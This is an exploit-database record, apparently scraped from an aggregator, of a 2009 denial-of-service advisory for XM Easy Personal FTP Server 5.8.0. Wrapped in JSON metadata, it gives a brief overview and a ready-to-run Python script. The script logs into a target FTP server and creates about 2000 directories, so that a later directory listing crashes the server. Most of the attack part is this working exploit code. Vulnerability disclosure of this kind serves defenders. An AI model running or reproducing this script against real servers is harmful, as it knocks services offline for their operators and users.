XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
{"lastseen": "2020-04-01T19:05:27", "references": [], "description": "\nXM Easy Personal FTP Server 5.8.0 - Remote Denial of Service", "edition": 1, "reporter": "leinakesi", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2009-11-24T00:00:00", "title": "XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2009-11-24T00:00:00", "id": "EXPLOITPACK:1D750982050E4C0E41589A47080EB23E", "href": "", "viewCount": 3, "sourceData": "Date of Discovery: 24-Nov-2009\n\nCredits:leinakesi[at]gmail.com\n\nVendor: Dxmsoft\n*******************************************************************************\nAffected:\n\n XM Easy Personal FTP Server 5.8.0\n Earlier versions may also be affected\n*******************************************************************************\nOverview:\n\n XM Easy Personal FTP Server failed to handle more than 2000 files or folders in \n\nthe root directory.\n*******************************************************************************\nDetails:\n\n if you could log on the server, take the following steps and the server will \n\ncrash which lead to DoS.\n \n 1.upload 2000 files or folders.\n 2.close the current connection.\n 3.use a ftp client to reconnect the server.\n user ...\n pass ...\n port ...\n list ...\n crash!!!!!!\n*******************************************************************************\nExploit example:\n\n1.upload 2000 folders.\n#!/usr/bin/python\nimport socket\nimport sys\n\ndef Usage():\n print (\"Usage: ./expl.py <serv_ip> <Username> <password>\\n\")\n print (\"Example:./expl.py 192.168.48.183 anonymous anonymous\\n\")\nif len(sys.argv) <> 4:\n Usage()\n sys.exit(1)\nelse:\n hostname=sys.argv[1]\n username=sys.argv[2]\n passwd=sys.argv[3]\n test_string='a'\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n sock.connect((hostname, 21))\n except:\n print (\"Connection error!\")\n sys.exit(1)\n r=sock.recv(1024)\n sock.send(\"user %s\\r\\n\" %username)\n r=sock.recv(1024)\n sock.send(\"pass %s\\r\\n\" %passwd)\n\n for i in range(1,200):\n sock.send(\"mkd \" + \"a\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"a\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"b\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"b\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"c\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"c\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"d\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"d\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"e\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"e\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"f\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"f\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"g\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"g\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"h\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"h\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"i\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"i\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n for i in range(1,200):\n sock.send(\"mkd \" + \"j\" * i +\"\\r\\n\")\n print \"[-] \" + (\"mkd \" + \"j\" * i +\"\\r\\n\")\n r=sock.recv(1024)\n print \"[+] \" + r + \"\\r\\n\"\n\n sock.close()\n sys.exit(0);\n\n2.use a ftp client to reconnect the server\nfor example:\nstart->run->cmd->ftp 127.0.0.1->*****->*****->dir", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645749427, "score": 1659814272}, "_internal": {"score_hash": "936522561c34a0398d661307eb3ee4a9"}}
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service